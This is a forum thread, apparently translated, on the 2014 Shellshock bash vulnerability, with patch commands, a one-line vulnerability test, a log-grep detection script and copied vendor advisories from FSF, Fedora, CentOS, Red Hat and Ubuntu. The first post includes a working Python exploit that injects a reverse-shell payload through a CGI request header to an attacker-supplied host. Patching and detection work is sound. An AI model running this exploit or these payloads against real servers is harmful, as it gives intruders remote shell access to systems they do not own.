Bash security issue "SHELLSHOCK": discovered at the end of September 2014, please update and patch as soon as possible




Type(Type) 2015/1/30 17:40 (Since 2014/9/26 13:16)

Bash Security Bugs: discovered at the end of September 2014, please update and patch as soon as possible (especially servers running bash CGI-BIN services)

Short name: ShellShock (of course, it gets a name just like HeartBleed)
ShellShock impact: all Unix/Linux/BSD/MacOS/Windows systems that use bash are affected
ShellShock affected BASH versions: => bash 1.14 ~ bash 4.3 (almost a zero-day bug)
References:
https://securityblog.redhat.com/2014/09/24/bash-specially-crafted-environment-variables-code-injection-attack/
http://seclists.org/oss-sec/2014/q3/666

Patching is simple:
@ Ubuntu / Debian
$ apt-get update;apt-get upgrade
$ apt-get update && sudo apt-get install --only-upgrade bash (update bash only)
@ Fedora/CentOS
$ yum update
$ yum update bash (update bash only)
Of course, "safe" assumes you have not already been broken into through this vulnerability.

Scenarios the vulnerability may affect:
1. Apache HTTP Servers (mod_cgi and mod_cgid) + Bash CGI scripts
2. Certain DHCP clients
3. OpenSSH server using the "ForceCommand" option
4. Related network services whose path uses an unpatched bash

Q: How to detect it?
The simplest sample code is the single line below. If you see "vulnerable" printed first and only then "this is a test", your bash has the security bug.
Code:
$ env x='() { :;}; echo vulnerable' bash -c "echo this is a test"




Example Code #2:
Code:
#
# CVE-2014-6271 cgi-bin reverse shell
#
import httplib,urllib,sys

if (len(sys.argv)<4):
   print "Usage: %s <host> <vulnerable CGI> <attackhost/IP>" % sys.argv[0]
   print "Example: %s localhost /cgi-bin/test.cgi 10.0.0.1/8080" % sys.argv[0]
   exit(0)

conn = httplib.HTTPConnection(sys.argv[1])
reverse_shell="() { ignored;};/bin/bash -i >& /dev/tcp/%s 0>&1" % sys.argv[3]

headers = {"Content-type": "application/x-www-form-urlencoded",
   "test":reverse_shell }
conn.request("GET",sys.argv[2],headers=headers)
res = conn.getresponse()
print res.status, res.reason
data = res.read()
print data
Example Code #3:
Code:
$ gcc bug.c
$ env TERM='() { :;}; echo vulnerable' a.out
vulnerable
#include <stdlib.h>
int main(void)
{
    return system("cat bug.c");
}
Update your Ubuntu/Redhat/Fedora/Debian
Code:
$ ls -al /bin/bash
-rwxr-xr-x 1 root root 959120 Mar 29  2013 /bin/bash
$ apt-get update
$ apt-get upgrade
Reading package lists... Done
Building dependency tree
Reading state information... Done
The following packages have been kept back:
  linux-image-virtual
The following packages will be upgraded:
  apt apt-utils bash dbus firefox-locale-en libapt-inst1.4 libapt-pkg4.12
  libdbus-1-3 libnss3 libnss3-1d
10 upgraded, 0 newly installed, 0 to remove and 1 not upgraded.
Need to get 5,421 kB of archives.
After this operation, 10.2 kB of additional disk space will be used.
Do you want to continue [Y/n]?
%  ls -al /bin/bash
-rwxr-xr-x 1 root root 959120  Sep 23 04:39 /bin/bash
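Scenario 1 above (Apache mod_cgi plus bash CGI scripts) is the one most servers get hit through: the attacker puts the function-definition string into an HTTP request header, and the CGI script inherits it as an HTTP_* environment variable. The combined access-log format records two of those headers (Referer and User-Agent), so probes are usually visible in the web logs. The script below is an added example, not code from this thread; it greps combined-format log lines for the `() {` marker. The function names and the sample log lines are constructed for this example.

```shell
#!/bin/sh
# Added example, not code from the original thread: look for the Shellshock
# marker in web-server access logs. Attacks against mod_cgi arrive in HTTP
# request headers, which the CGI script inherits as HTTP_* environment
# variables; the "combined" log format records two of those headers
# (Referer and User-Agent), so probes are often visible there. Function
# names and the sample log lines below are constructed for this example.

# A bash function export begins with "() {"; probes vary the spacing
# ("(){", "() {", "() { :;}"), so allow optional whitespace in between.
SHELLSHOCK_RE='\(\)[[:space:]]*\{'

# Constructed sample log in Apache/nginx "combined" format. Line 2 carries
# the marker in User-Agent, line 3 (no-space variant) in Referer; the other
# two are clean. "(X11;" must not match: it is not "()".
SAMPLE_LOG=$(cat <<'EOF'
10.0.0.5 - - [25/Sep/2014:10:01:02 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0 (X11; Linux x86_64)"
10.0.0.9 - - [25/Sep/2014:10:01:07 +0000] "GET /cgi-bin/test.cgi HTTP/1.1" 200 17 "-" "() { :;}; echo vulnerable"
10.0.0.9 - - [25/Sep/2014:10:01:09 +0000] "GET /cgi-bin/test.cgi HTTP/1.1" 200 17 "(){ :;}; echo vulnerable" "curl/7.35.0"
10.0.0.7 - - [25/Sep/2014:10:02:00 +0000] "POST /login HTTP/1.1" 302 0 "http://example.com/" "Mozilla/5.0 (X11; Linux x86_64)"
EOF
)

# shellshock_lines: read log lines on stdin, print the offending ones with
# their line numbers (exit status 1 when nothing matched, like grep).
shellshock_lines() {
    grep -E -n "$SHELLSHOCK_RE"
}

# shellshock_count: read log lines on stdin, print how many lines matched
# (prints 0 on a clean log instead of failing).
shellshock_count() {
    grep -E -c "$SHELLSHOCK_RE" || true
}

# Stand-alone run: report hits in the sample, then the count.
printf '%s\n' "$SAMPLE_LOG" | shellshock_lines
printf 'hits: %s\n' "$(printf '%s\n' "$SAMPLE_LOG" | shellshock_count)"
```

Run it against a real log with `shellshock_lines < /var/log/apache2/access.log`. Keep in mind the limits of this check: only Referer and User-Agent are logged by default, so a probe sent in Cookie or a custom header leaves no trace in the access log, and a hit only proves an attempt, not a successful exploit; the CGI's own behaviour (unexpected child processes, outbound connections from the web server user) is what confirms the latter.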


Type(Type) 2014/9/27 11:56

Free Software Foundation statement on the GNU Bash "ShellShock" vulnerability

Original: http://www.fsf.org/news/free-software-foundation-statement-on-the-gnu-bash-shellshock-vulnerability
Quick translated summary:
1. A major security problem was found in GNU Bash; a temporary fix is already available and a complete fix is in progress. All systems using bash should update immediately and monitor bash-related network services.
2. The bug, commonly called "ShellShock", can under certain conditions let an attacker obtain root privileges, whether directly through bash or through (network) applications whose call path includes bash. See NVD:
https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-6271
https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-7169
3. Because GNU Bash is free software and reliable and useful, ShellShock's impact is widespread; fortunately, because it is GPL V3, free software developers such as Red Hat could respond to the bug quickly and share the patch so that the major upstream developers could fix it in sync.
4. Everyone can freely download, inspect and patch their own bash, unlike Microsoft or Apple or other proprietary software. (The article also takes a jab at Microsoft & Apple along the way; not sure why an official FSF statement has to do that...)
5. Software freedom is one of the main preconditions for security: it guarantees everyone can inspect and test the security of the code they use, and thereby improve it and produce more secure software.
6. Neither free nor proprietary software is guaranteed to be bug-free; bugs happen and have nothing to do with the "licensing model". But when a bug is found in free software, everyone has the permission, the power and the source code to copy and fix it, and the patch is then quickly and freely distributed into everyone's hands. This freedom is crucial for secure computing.
7. Proprietary (non-free) software relies on an "unjust" development model that hides the source code and strips users of their basic rights; this not only makes security flaws hard to find, it also makes it easy for vendors to deliberately plant potentially harmful content and to conceal serious problems they have already found. Reports indicate that Microsoft once gave government intelligence agencies information about unfixed vulnerabilities. ( http://www.computerworlduk.com/blogs/open-enterprise/how-can-any-company-ever-trust-microsoft-again-3569376/ )
8. Free software does not guarantee your security; in some cases vulnerabilities may be easier to find than in proprietary software. But compared with "vulnerabilities that are hard to find", continuous monitoring and improvement of free software is what matters.
9. Development of BASH and other GNU software is mostly contributed by volunteer organisations or individuals giving their talent and time; we are reviewing Bash development and looking at whether increased funding for the bash project could prevent similar problems in the future; if you or your organisation uses bash and is interested in supporting bash, please contact us ( http://www.fsf.org/news/donate@fsf.org )
Free Software Foundation media contact: John Sullivan, Executive Director, Free Software Foundation, +1 (617) 542 5942, campaigns@fsf.org


Type(Type) 2014/9/27 13:41

Fedora Bash Update: Fedora 19, Fedora 20

From: updates@fedoraproject.org
To: package-announce@lists.fedoraproject.org
Subject: [SECURITY] Fedora 19 Update: bash-4.2.48-2.fc19
Date: Fri, 26 Sep 2014 09:00:48 +0000
Message-ID: <20140926090050.9FE1722338@bastion01.phx2.fedoraproject.org>

--------------------------------------------------------------------------------
Fedora Update Notification
FEDORA-2014-11514
2014-09-26 08:10:17
--------------------------------------------------------------------------------
Name        : bash
Product     : Fedora 19
Version     : 4.2.48
Release     : 2.fc19
URL         : http://www.gnu.org/software/bash
Summary     : The GNU Bourne Again shell
Description :
The GNU Bourne Again shell (Bash) is a shell or command language
interpreter that is compatible with the Bourne shell (sh). Bash
incorporates useful features from the Korn shell (ksh) and the C shell
(csh). Most sh scripts can be run by bash without modification.
--------------------------------------------------------------------------------
Update Information:

This build should fix cve-2014-7169
--------------------------------------------------------------------------------
ChangeLog:

* Thu Sep 25 2014 Ondrej Oprala <ooprala@redhat.com> - 4.2.48-2
- CVE-2014-7169 Resolves: #1146319+
* Thu Sep 25 2014 Ondrej Oprala <ooprala@redhat.com - 4.2.48-1
- Patchlevel 48
* Wed Sep 24 2014 Ondrej Oprala <ooprala@redhat.com - 4.2.47-2
- Inhibit code injection - patch by Stephane Chazelas
* Tue Apr 15 2014 Ondrej Oprala <ooprala@redhat.com> - 4.2.47-1
- Patchlevel 47
* Tue Apr  1 2014 Ondrej Oprala <ooprala@redhat.com> - 4.2.46-1
- Patchlevel 46
--------------------------------------------------------------------------------
References:

  [ 1 ] Bug #1146319 - CVE-2014-7169 bash: code execution via specially-crafted environment (Incomplete fix for CVE-2014-6271)
        https://bugzilla.redhat.com/show_bug.cgi?id=1146319
--------------------------------------------------------------------------------

This update can be installed with the "yum" update program.  Use
su -c 'yum update bash' at the command line.
For more information, refer to "Managing Software with yum",
available at http://docs.fedoraproject.org/yum/.

All packages are signed with the Fedora Project GPG key.  More details on the
GPG keys used by the Fedora Project can be found at
https://fedoraproject.org/keys
--------------------------------------------------------------------------------

From: updates@fedoraproject.org
To: package-announce@lists.fedoraproject.org
Subject: [SECURITY] Fedora 20 Update: bash-4.2.48-2.fc20
Date: Fri, 26 Sep 2014 09:03:00 +0000
Message-ID: <20140926090302.6FC4121113@bastion01.phx2.fedoraproject.org>

--------------------------------------------------------------------------------
Fedora Update Notification
FEDORA-2014-11527
2014-09-26 08:10:45
--------------------------------------------------------------------------------
Name        : bash
Product     : Fedora 20
Version     : 4.2.48
Release     : 2.fc20
URL         : http://www.gnu.org/software/bash
Summary     : The GNU Bourne Again shell
Description :
The GNU Bourne Again shell (Bash) is a shell or command language
interpreter that is compatible with the Bourne shell (sh). Bash
incorporates useful features from the Korn shell (ksh) and the C shell
(csh). Most sh scripts can be run by bash without modification.
--------------------------------------------------------------------------------
Update Information:

This build should fix cve-2014-7169
--------------------------------------------------------------------------------
ChangeLog:

* Thu Sep 25 2014 Ondrej Oprala <ooprala@redhat.com> - 4.2.48-2
- CVE-2014-7169 Resolves: #1146319+
* Thu Sep 25 2014 Ondrej Oprala <ooprala@redhat.com - 4.2.48-1
- Patchlevel 48
* Wed Sep 24 2014 Ondrej Oprala <ooprala@redhat.com - 4.2.47-4
- Inhibit code injection - patch by Stephane Chazelas
* Mon Jul 21 2014 Ondrej Oprala <ooprala@redhat.com - 4.2.47-3
- Mention ulimit -c and -f block size in POSIX mode
* Tue Apr 15 2014 Ondrej Oprala <ooprala@redhat.com - 4.2.47-2
- Proper patchlevel 47
* Tue Apr 15 2014 Ondrej Oprala <ooprala@redhat.com - 4.2.47-1
- Patchlevel 47
* Tue Apr  1 2014 Ondrej Oprala <ooprala@redhat.com - 4.2.46-1
- Patchlevel 46
--------------------------------------------------------------------------------
References:

  [ 1 ] Bug #1146319 - CVE-2014-7169 bash: code execution via specially-crafted environment (Incomplete fix for CVE-2014-6271)
        https://bugzilla.redhat.com/show_bug.cgi?id=1146319
--------------------------------------------------------------------------------

This update can be installed with the "yum" update program.  Use
su -c 'yum update bash' at the command line.
For more information, refer to "Managing Software with yum",
available at http://docs.fedoraproject.org/yum/.

All packages are signed with the Fedora Project GPG key.  More details on the
GPG keys used by the Fedora Project can be found at
https://fedoraproject.org/keys
--------------------------------------------------------------------------------

CentOS 5 / CentOS 6 / CentOS 7

From: Johnny Hughes <johnny@centos.org>
To: centos-announce@centos.org
Subject: [CentOS-announce] CESA-2014:1306 Important CentOS 5 bash Security Update
Date: Fri, 26 Sep 2014 02:16:02 +0000
Message-ID: <20140926021602.GA3213@chakra.karan.org>

CentOS Errata and Security Advisory 2014:1306 Important

Upstream details at : https://rhn.redhat.com/errata/RHSA-2014-1306.html

The following updated files have been uploaded and are currently
syncing to the mirrors: ( sha256sum Filename )

i386:
9755e86ad8536c908f95340be308190b52989bfa0d9268a461c40a3f0d493bc7  bash-3.2-33.el5_10.4.i386.rpm

x86_64:
b1e14edd0d675c6fb0be64cb875fbd9fac208a58e427ea32f373c9359b35642c  bash-3.2-33.el5_10.4.x86_64.rpm

Source:
b71bd90354d2724f256f9f23e113eea89c98b3ce923380657461cb78d34ab8da  bash-3.2-33.el5_10.4.src.rpm

--
Johnny Hughes
CentOS Project { http://www.centos.org/ }
irc: hughesjr, #centos@irc.freenode.net

From: Johnny Hughes <johnny@centos.org>
To: centos-announce@centos.org
Subject: [CentOS-announce] CESA-2014:1306 Important CentOS 6 bash Security Update
Date: Fri, 26 Sep 2014 02:24:20 +0000
Message-ID: <20140926022420.GA62097@n04.lon1.karan.org>

CentOS Errata and Security Advisory 2014:1306 Important

Upstream details at : https://rhn.redhat.com/errata/RHSA-2014-1306.html

The following updated files have been uploaded and are currently
syncing to the mirrors: ( sha256sum Filename )

i386:
28a674dd09ca395b3021749ebf8928806ae981a325c02b8ead070e75cdae2cab  bash-4.1.2-15.el6_5.2.i686.rpm
333f57db85ea63636650d1b491c07a5d0ccb722e9353db5f22a62685d96c9da7  bash-doc-4.1.2-15.el6_5.2.i686.rpm

x86_64:
72fb8fa60fce9ccd1f221ace44d7a29870856d9033819d2c3e75885881cf6a4a  bash-4.1.2-15.el6_5.2.x86_64.rpm
18cde2ec120c8d351c60ae3901bb6706f4c97abbf2b87cdec5ed1ba4175c84a2  bash-doc-4.1.2-15.el6_5.2.x86_64.rpm

Source:
d0a8f52d7db4c729c17188a2bd690aff2371f8ac86900dabb14b0df5aa1ff6a5  bash-4.1.2-15.el6_5.2.src.rpm

From: Johnny Hughes <johnny@centos.org>
To: centos-announce@centos.org
Subject: [CentOS-announce] CESA-2014:1306 Important CentOS 7 bash Security Update
Date: Fri, 26 Sep 2014 02:23:24 +0000
Message-ID: <20140926022324.GA61885@n04.lon1.karan.org>

CentOS Errata and Security Advisory 2014:1306 Important

Upstream details at : https://rhn.redhat.com/errata/RHSA-2014-1306.html

The following updated files have been uploaded and are currently
syncing to the mirrors: ( sha256sum Filename )

x86_64:
d2806c39117791707b6f528afd2bfa35b20a67f6ad40231057d6dd27f4eb7e36  bash-4.2.45-5.el7_0.4.x86_64.rpm
9a66662961d2a359b71387436b03e1e951473b10dbf450e480c6787d584dc70e  bash-doc-4.2.45-5.el7_0.4.x86_64.rpm

Source:
b37570f9434b82c9f2df7920b1ab94e00039370b58ee1ab2c2235eeda53b88fb  bash-4.2.45-5.el7_0.4.src.rpm



Red Hat v5, Red Hat v6, Red Hat v7 BASH Update

From: bugzilla@redhat.com
To: rhsa-announce@redhat.com, enterprise-watch-list@redhat.com
Subject: [RHSA-2014:1306-01] Important: bash security update
Date: Fri, 26 Sep 2014 02:02:30 +0000
Message-ID: <201409260154.s8Q1s9AP014275@int-mx13.intmail.prod.int.phx2.redhat.com>

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

=====================================================================
                   Red Hat Security Advisory

Synopsis:          Important: bash security update
Advisory ID:       RHSA-2014:1306-01
Product:           Red Hat Enterprise Linux
Advisory URL:      https://rhn.redhat.com/errata/RHSA-2014-1306.html
Issue date:        2014-09-26
CVE Names:         CVE-2014-7169
=====================================================================

1. Summary:

Updated bash packages that fix one security issue are now available for Red
Hat Enterprise Linux 5, 6, and 7.

Red Hat Product Security has rated this update as having Important security
impact. A Common Vulnerability Scoring System (CVSS) base score, which
gives a detailed severity rating, is available from the CVE link in the
References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux (v. 5 server) - i386, ia64, ppc, s390x, x86_64
Red Hat Enterprise Linux Client (v. 7) - x86_64
Red Hat Enterprise Linux Client Optional (v. 7) - x86_64
Red Hat Enterprise Linux ComputeNode (v. 7) - x86_64
Red Hat Enterprise Linux ComputeNode Optional (v. 7) - x86_64
Red Hat Enterprise Linux Desktop (v. 5 client) - i386, x86_64
Red Hat Enterprise Linux Desktop (v. 6) - i386, x86_64
Red Hat Enterprise Linux Desktop Optional (v. 6) - i386, x86_64
Red Hat Enterprise Linux HPC Node (v. 6) - x86_64
Red Hat Enterprise Linux HPC Node Optional (v. 6) - x86_64
Red Hat Enterprise Linux Server (v. 6) - i386, ppc64, s390x, x86_64
Red Hat Enterprise Linux Server (v. 7) - ppc64, s390x, x86_64
Red Hat Enterprise Linux Server Optional (v. 6) - i386, ppc64, s390x, x86_64
Red Hat Enterprise Linux Server Optional (v. 7) - ppc64, s390x, x86_64
Red Hat Enterprise Linux Workstation (v. 6) - i386, x86_64
Red Hat Enterprise Linux Workstation (v. 7) - x86_64
Red Hat Enterprise Linux Workstation Optional (v. 6) - i386, x86_64
Red Hat Enterprise Linux Workstation Optional (v. 7) - x86_64

3. Description:

The GNU Bourne Again shell (Bash) is a shell and command language
interpreter compatible with the Bourne shell (sh). Bash is the default
shell for Red Hat Enterprise Linux.

It was found that the fix for CVE-2014-6271 was incomplete, and Bash still
allowed certain characters to be injected into other environments via
specially crafted environment variables. An attacker could potentially use
this flaw to override or bypass environment restrictions to execute shell
commands. Certain services and applications allow remote unauthenticated
attackers to provide environment variables, allowing them to exploit this
issue. (CVE-2014-7169)

Applications which directly create bash functions as environment variables
need to be made aware of changes to the way names are handled by this
update. For more information see the Knowledgebase article at
https://access.redhat.com/articles/1200223

Note: Docker users are advised to use "yum update" within their containers,
and to commit the resulting changes.

For additional information on CVE-2014-6271 and CVE-2014-7169, refer to the
aforementioned Knowledgebase article.

All bash users are advised to upgrade to these updated packages, which
contain a backported patch to correct this issue.

4. Solution:

Before applying this update, make sure all previously released errata
relevant to your system have been applied.

This update is available via the Red Hat Network. Details on how to use the
Red Hat Network to apply this update are available at
https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

1146319 - CVE-2014-7169 bash: code execution via specially-crafted environment (Incomplete fix for CVE-2014-6271)

6. Package List:

Red Hat Enterprise Linux Desktop (v. 5 client):

Source:
bash-3.2-33.el5_11.4.src.rpm

i386:
bash-3.2-33.el5_11.4.i386.rpm
bash-debuginfo-3.2-33.el5_11.4.i386.rpm

x86_64:
bash-3.2-33.el5_11.4.x86_64.rpm
bash-debuginfo-3.2-33.el5_11.4.x86_64.rpm

Red Hat Enterprise Linux (v. 5 server):

Source:
bash-3.2-33.el5_11.4.src.rpm

i386:
bash-3.2-33.el5_11.4.i386.rpm
bash-debuginfo-3.2-33.el5_11.4.i386.rpm

ia64:
bash-3.2-33.el5_11.4.i386.rpm
bash-3.2-33.el5_11.4.ia64.rpm
bash-debuginfo-3.2-33.el5_11.4.i386.rpm
bash-debuginfo-3.2-33.el5_11.4.ia64.rpm

ppc:
bash-3.2-33.el5_11.4.ppc.rpm
bash-debuginfo-3.2-33.el5_11.4.ppc.rpm

s390x:
bash-3.2-33.el5_11.4.s390x.rpm
bash-debuginfo-3.2-33.el5_11.4.s390x.rpm

x86_64:
bash-3.2-33.el5_11.4.x86_64.rpm
bash-debuginfo-3.2-33.el5_11.4.x86_64.rpm

Red Hat Enterprise Linux Desktop (v. 6):

Source:
bash-4.1.2-15.el6_5.2.src.rpm

i386:
bash-4.1.2-15.el6_5.2.i686.rpm
bash-debuginfo-4.1.2-15.el6_5.2.i686.rpm

x86_64:
bash-4.1.2-15.el6_5.2.x86_64.rpm
bash-debuginfo-4.1.2-15.el6_5.2.x86_64.rpm

Red Hat Enterprise Linux Desktop Optional (v. 6):

Source:
bash-4.1.2-15.el6_5.2.src.rpm

i386:
bash-debuginfo-4.1.2-15.el6_5.2.i686.rpm
bash-doc-4.1.2-15.el6_5.2.i686.rpm

x86_64:
bash-debuginfo-4.1.2-15.el6_5.2.x86_64.rpm
bash-doc-4.1.2-15.el6_5.2.x86_64.rpm

Red Hat Enterprise Linux HPC Node (v. 6):

Source:
bash-4.1.2-15.el6_5.2.src.rpm

x86_64:
bash-4.1.2-15.el6_5.2.x86_64.rpm
bash-debuginfo-4.1.2-15.el6_5.2.x86_64.rpm

Red Hat Enterprise Linux HPC Node Optional (v. 6):

Source:
bash-4.1.2-15.el6_5.2.src.rpm

x86_64:
bash-debuginfo-4.1.2-15.el6_5.2.x86_64.rpm
bash-doc-4.1.2-15.el6_5.2.x86_64.rpm

Red Hat Enterprise Linux Server (v. 6):

Source:
bash-4.1.2-15.el6_5.2.src.rpm

i386:
bash-4.1.2-15.el6_5.2.i686.rpm
bash-debuginfo-4.1.2-15.el6_5.2.i686.rpm

ppc64:
bash-4.1.2-15.el6_5.2.ppc64.rpm
bash-debuginfo-4.1.2-15.el6_5.2.ppc64.rpm

s390x:
bash-4.1.2-15.el6_5.2.s390x.rpm
bash-debuginfo-4.1.2-15.el6_5.2.s390x.rpm

x86_64:
bash-4.1.2-15.el6_5.2.x86_64.rpm
bash-debuginfo-4.1.2-15.el6_5.2.x86_64.rpm

Red Hat Enterprise Linux Server Optional (v. 6):

Source:
bash-4.1.2-15.el6_5.2.src.rpm

i386:
bash-debuginfo-4.1.2-15.el6_5.2.i686.rpm
bash-doc-4.1.2-15.el6_5.2.i686.rpm

ppc64:
bash-debuginfo-4.1.2-15.el6_5.2.ppc64.rpm
bash-doc-4.1.2-15.el6_5.2.ppc64.rpm

s390x:
bash-debuginfo-4.1.2-15.el6_5.2.s390x.rpm
bash-doc-4.1.2-15.el6_5.2.s390x.rpm

x86_64:
bash-debuginfo-4.1.2-15.el6_5.2.x86_64.rpm
bash-doc-4.1.2-15.el6_5.2.x86_64.rpm

Red Hat Enterprise Linux Workstation (v. 6):

Source:
bash-4.1.2-15.el6_5.2.src.rpm

i386:
bash-4.1.2-15.el6_5.2.i686.rpm
bash-debuginfo-4.1.2-15.el6_5.2.i686.rpm

x86_64:
bash-4.1.2-15.el6_5.2.x86_64.rpm
bash-debuginfo-4.1.2-15.el6_5.2.x86_64.rpm

Red Hat Enterprise Linux Workstation Optional (v. 6):

Source:
bash-4.1.2-15.el6_5.2.src.rpm

i386:
bash-debuginfo-4.1.2-15.el6_5.2.i686.rpm
bash-doc-4.1.2-15.el6_5.2.i686.rpm

x86_64:
bash-debuginfo-4.1.2-15.el6_5.2.x86_64.rpm
bash-doc-4.1.2-15.el6_5.2.x86_64.rpm

Red Hat Enterprise Linux Client (v. 7):

Source:
bash-4.2.45-5.el7_0.4.src.rpm

x86_64:
bash-4.2.45-5.el7_0.4.x86_64.rpm
bash-debuginfo-4.2.45-5.el7_0.4.x86_64.rpm

Red Hat Enterprise Linux Client Optional (v. 7):

x86_64:
bash-debuginfo-4.2.45-5.el7_0.4.x86_64.rpm
bash-doc-4.2.45-5.el7_0.4.x86_64.rpm

Red Hat Enterprise Linux ComputeNode (v. 7):

Source:
bash-4.2.45-5.el7_0.4.src.rpm

x86_64:
bash-4.2.45-5.el7_0.4.x86_64.rpm
bash-debuginfo-4.2.45-5.el7_0.4.x86_64.rpm

Red Hat Enterprise Linux ComputeNode Optional (v. 7):

x86_64:
bash-debuginfo-4.2.45-5.el7_0.4.x86_64.rpm
bash-doc-4.2.45-5.el7_0.4.x86_64.rpm

Red Hat Enterprise Linux Server (v. 7):

Source:
bash-4.2.45-5.el7_0.4.src.rpm

ppc64:
bash-4.2.45-5.el7_0.4.ppc64.rpm
bash-debuginfo-4.2.45-5.el7_0.4.ppc64.rpm

s390x:
bash-4.2.45-5.el7_0.4.s390x.rpm
bash-debuginfo-4.2.45-5.el7_0.4.s390x.rpm

x86_64:
bash-4.2.45-5.el7_0.4.x86_64.rpm
bash-debuginfo-4.2.45-5.el7_0.4.x86_64.rpm

Red Hat Enterprise Linux Server Optional (v. 7):

ppc64:
bash-debuginfo-4.2.45-5.el7_0.4.ppc64.rpm
bash-doc-4.2.45-5.el7_0.4.ppc64.rpm

s390x:
bash-debuginfo-4.2.45-5.el7_0.4.s390x.rpm
bash-doc-4.2.45-5.el7_0.4.s390x.rpm

x86_64:
bash-debuginfo-4.2.45-5.el7_0.4.x86_64.rpm
bash-doc-4.2.45-5.el7_0.4.x86_64.rpm

Red Hat Enterprise Linux Workstation (v. 7):

Source:
bash-4.2.45-5.el7_0.4.src.rpm

x86_64:
bash-4.2.45-5.el7_0.4.x86_64.rpm
bash-debuginfo-4.2.45-5.el7_0.4.x86_64.rpm

Red Hat Enterprise Linux Workstation Optional (v. 7):

x86_64:
bash-debuginfo-4.2.45-5.el7_0.4.x86_64.rpm
bash-doc-4.2.45-5.el7_0.4.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and
details on how to verify the signature are available from
https://access.redhat.com/security/team/key/#package

7. References:

https://www.redhat.com/security/data/cve/CVE-2014-7169.html
https://access.redhat.com/security/updates/classification...
https://access.redhat.com/articles/1200223

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact
details at https://access.redhat.com/security/team/contact/

Copyright 2014 Red Hat, Inc.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1

iD8DBQFUJMc4XlSAg2UNWIIRAsowAKCeLFE4QctUYTBC7bvqd6RTgUMptACcC2jt
wqMN2oFvaGhf5SqiZHqpyOA=
=Unt1
-----END PGP SIGNATURE-----

Ubuntu 10.04 / 12.04 / 14.04 BASH Update

From: Marc Deslauriers <marc.deslauriers@canonical.com>
To: ubuntu-security-announce@lists.ubuntu.com
Subject: [USN-2363-1] Bash vulnerability
Date: Thu, 25 Sep 2014 18:35:21 -0400
Message-ID: <542498A9.6020900@canonical.com>

==========================================================================
Ubuntu Security Notice USN-2363-1
September 25, 2014

bash vulnerability
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 14.04 LTS
- Ubuntu 12.04 LTS
- Ubuntu 10.04 LTS

Summary:

Bash allowed bypassing environment restrictions in certain environments.

Software Description:
- bash: GNU Bourne Again SHell

Details:

Tavis Ormandy discovered that the security fix for Bash included in
USN-2362-1 was incomplete. An attacker could use this issue to bypass
certain environment restrictions. (CVE-2014-7169)

Update instructions:

The problem can be corrected by updating your system to the following
package versions:

Ubuntu 14.04 LTS:
  bash                            4.3-7ubuntu1.2

Ubuntu 12.04 LTS:
  bash                            4.2-2ubuntu2.3

Ubuntu 10.04 LTS:
  bash                            4.1-2ubuntu3.2

In general, a standard system update will make all the necessary changes.

References:
  http://www.ubuntu.com/usn/usn-2363-1
  CVE-2014-7169

Package Information:
  https://launchpad.net/ubuntu/+source/bash/4.3-7ubuntu1.2
  https://launchpad.net/ubuntu/+source/bash/4.2-2ubuntu2.3
  https://launchpad.net/ubuntu/+source/bash/4.1-2ubuntu3.2


Type(Type) 2014/9/27 15:57 (Since 2014/9/27 14:33)

Related ShellShock References


Type(Type) 2014/9/27 14:40

Ubuntu 10.04/12.04/14.04 have a new update

Code:
$ ls -al /bin/bash
-rwxr-xr-x 1 root root 959120  Sep 23 04:39 /bin/bash
$ md5sum /bin/bash
d63ff62f142e76205e89e4a4de553fec  /bin/bash
$ apt-get upgrade
[14:38] > apt-get upgrade
Reading package lists... Done
Building dependency tree
Reading state information... Done
The following packages will be upgraded:
  bash grub-common
2 upgraded, 0 newly installed, 0 to remove and 1 not upgraded.
Need to get 2,715 kB of archives.
After this operation, 0 B of additional disk space will be used.
Do you want to continue [Y/n]? y
Get:1 http://archive.ubuntu.com/ubuntu/ precise-updates/main bash amd64 4.2-2ubuntu2.3 [641 kB]
Get:2 http://archive.ubuntu.com/ubuntu/ precise-updates/main grub-common amd64 1.99-21ubuntu3.17 [2,074 kB]
Fetched 2,715 kB in 2s (1,129 kB/s)
(Reading database ... 29737 files and directories currently installed.)
Preparing to replace bash 4.2-2ubuntu2.2 (using .../bash_4.2-2ubuntu2.3_amd64.deb) ...
Unpacking replacement bash ...
Processing triggers for man-db ...
Setting up bash (4.2-2ubuntu2.3) ...
update-alternatives: using /usr/share/man/man7/bash-builtins.7.gz to provide /usr/share/man/man7/builtins.7.gz (builtins.7.gz) in auto mode.
(Reading database ... 29737 files and directories currently installed.)
Preparing to replace grub-common 1.99-21ubuntu3.16 (using .../grub-common_1.99-21ubuntu3.17_amd64.deb) ...
Unpacking replacement grub-common ...
Processing triggers for ureadahead ...
Processing triggers for man-db ...
Setting up grub-common (1.99-21ubuntu3.17) ...
$  ls -al /bin/bash
-rwxr-xr-x 1 root root 959120  Sep 25 14:50 /bin/bash
$ md5sum /bin/bash
5ee533c7cd3a8246b4a3d7a29ffbe0b2 /bin/bash (Ubuntu 12.04 LTS x86_64 bash)
$ md5sum /bin/bash
eb8a956c0a1164b84262505a629e8a1f /bin/bash (Ubuntu 14.04 LTS x86_64 bash)


Type(Type) 2014/9/28 10:24




bash update 09/28

Code:
$ apt-get upgrade
Reading package lists... Done
Building dependency tree
Reading state information... Done
Calculating upgrade... Done
The following packages will be upgraded:
  bash
1 upgraded, 0 newly installed, 0 to remove and 0 not upgraded.
Need to get 576 kB of archives.
After this operation, 8192 B of additional disk space will be used.
Do you want to continue? [Y/n] y
Preparing to unpack .../bash_4.3-7ubuntu1.4_amd64.deb ...
Unpacking bash (4.3-7ubuntu1.4) over (4.3-7ubuntu1.3) ...
Processing triggers for man-db (2.6.7.1-1) ...
Processing triggers for install-info (5.2.0.dfsg.1-2) ...
Setting up bash (4.3-7ubuntu1.4) ...
update-alternatives: using /usr/share/man/man7/bash-builtins.7.gz to provide /usr/share/man/man7/builtins.7.gz (builtins.7.gz) in auto mode
$ ls -al /bin/bash
-rwxr-xr-x 1 root root 1021112  Sep 27 16:04 /bin/bash
$ md5sum /bin/bash
b81de36b3ef3bb64229833c055560c0f  /bin/bash
